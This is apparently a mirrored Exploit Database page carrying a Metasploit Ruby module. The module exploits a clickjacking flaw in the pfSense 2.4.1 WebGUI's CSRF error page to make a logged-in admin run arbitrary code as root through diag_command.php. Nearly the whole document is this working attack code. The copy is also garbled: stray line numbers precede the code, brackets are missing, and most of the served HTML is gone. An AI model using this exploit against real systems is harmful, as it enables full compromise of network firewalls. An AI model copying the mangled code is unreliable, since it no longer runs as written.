pfSense 2.4.1 – Cross-Site Request Forgery Error Page Clickjacking (Metasploit)

Exploit Database
116 阅读

作者： Metasploit

日期： 2017-12-14
类别：
- remote
平台：
- php
来源：https://www.exploit-db.com/exploits/43341/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})

super(

update_info(

info,

'Name'=> 'Clickjacking Vulnerability In CSRF Error Page pfSense',

'Description' => %q{

This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.

pfSense is a free and open source firewall and router. It was found that the

pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin

into interacting with a specially crafted webpage it is possible for an attacker

to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user,

this will result in a full compromise of the pfSense instance.

'Author'=> 'Yorick Koster',

'Payload' => { 'BadChars' => '"' },

'License' => MSF_LICENSE,

'References'=>

[

['URL', 'https://securify.nl/en/advisory/SFY20171101/clickjacking-vulnerability-in-csrf-error-page-pfsense.html'],

['URL', 'https://doc.pfsense.org/index.php/2.4.2_New_Features_and_Changes']

'DefaultOptions'=>

{

'EXITFUNC'=> 'process'

'Arch'=> ARCH_PHP,

'Platform'=> 'php',

'Targets' =>

[

[ 'pfSense <= 2.4.1', { 'auto' => false } ]

'DefaultTarget' => 0,

'DisclosureDate'=> 'Nov 21 2017'

)

register_options(

[

OptString.new('TARGETURI', [true, 'The base path to the web application', 'https://192.168.1.1'])

]

)

end

def js_file

@js ||= lambda {

path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.js')

return File.read(path)

}.call

end

def css_file

@css ||= lambda {

path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.css')

return File.read(path)

}.call

end

def background_file

@background ||= lambda {

path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'background.jpg')

return File.read(path)

}.call

end

def on_request_uri(cli, request)

print_status("GET #{request.uri} #{request.headers['User-Agent']}")

resp = create_response(200, "OK")

if request.uri =~ /\.js$/

resp.body = js_file

resp['Content-Type'] = 'text/javascript'

elsif request.uri =~ /\.css$/

resp.body = css_file

resp['Content-Type'] = 'text/css'

elsif request.uri =~ /\.jpg$/

resp.body = background_file

resp['Content-Type'] = 'image/jpg'

else

if datastore['TARGETURI'].end_with? '/'

url = datastore['TARGETURI'] + 'diag_command.php'

else

url = datastore['TARGETURI'] + '/diag_command.php'

end

framename = rand_text_alpha(16)

divname = rand_text_alpha(16)

resp.body = %Q|<!DOCTYPE html>

<html>

window.addEventListener("load", function(){

window.cookieconsent.initialise({

"palette": {

"popup": {

"background": "#000",

"text": "#0f0"

"button": {

"background": "#0f0"

}

"position": "top",

"static": true

});

</script>

document.cookie = 'cookieconsent_status=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';

window.addEventListener('load', function(){

document.forms[0].post.click();

document.onmousemove = function(e) {

var e = e \|\| window.event;

var s = document.getElementById('#{divname}');

s.style.left= (e.clientX - 10) + 'px';

s.style.top = (e.clientY - 5) + 'px';

};

});

</script>

</div>

</form>

</div>

</body>

</html>

resp['Content-Type'] = 'text/html'

end

cli.send_response(resp)

end